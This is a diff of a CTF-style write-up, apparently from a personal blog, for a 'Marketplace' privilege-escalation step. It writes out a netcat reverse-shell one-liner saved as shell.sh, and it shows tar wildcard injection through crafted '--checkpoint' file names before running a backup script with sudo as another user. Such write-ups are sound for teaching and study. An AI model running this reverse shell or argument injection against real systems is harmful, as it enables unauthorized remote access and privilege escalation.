CSpanias/cspanias.github.io/_posts/2023-10-20-Marketplace Write Up.md

     echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.3.202 9001 >/tmp/f" > shell.sh
     ```

-4. Create a file named `--checkpoint-action=exec=sh shell.sh`, which is designed to trick the system as it uses the `--checkpoint-action` flag.
+4. Now, create a second file resembling the `--checkpoint=1` argument, which defines the point that the checkpoint is reached:
-In this context, it's used to execute the `shell.ph` script when a checkpoint occurs.

     ```bash
+    touch /.--checkpoint=1
+    # or
-    echo "" > "--checkpoint-action=exec=sh shell.sh"
+    echo "" > --checkpoint=1
     ```

-5. Create a file named `--checkpoint=1` with the purpose of triggering the above checkpoint.
+5. Finally, create another file resembling the `--checkpoint-action=exec=` argument, which defines what `ACTION` will be executed when the checkpoint is reached, pointing to where our payload `shell.ph`:

     ```bash
+    touch ./--checkpoint-action=exec=sh shell.sh
+    # or
-    echo "" > --checkpoint=1
+    echo "" > "--checkpoint-action=exec=sh shell.sh"
     ```

-6. Modify permissions to make the files executable.
+6. Modify permissions to make the files executable:

     ```bash
     chmod 777 backup.tar shell.sh
     ```

-7. Run `backup.sh` as user `michael`, which will
+7. Run `backup.sh` as user `michael`.
+Once `backup.sh` is ran, the checkpoint will be reached, and as a result our `shell.ph` will be run:

     ```bash
     sudo -u michael /opt/backups/backup.sh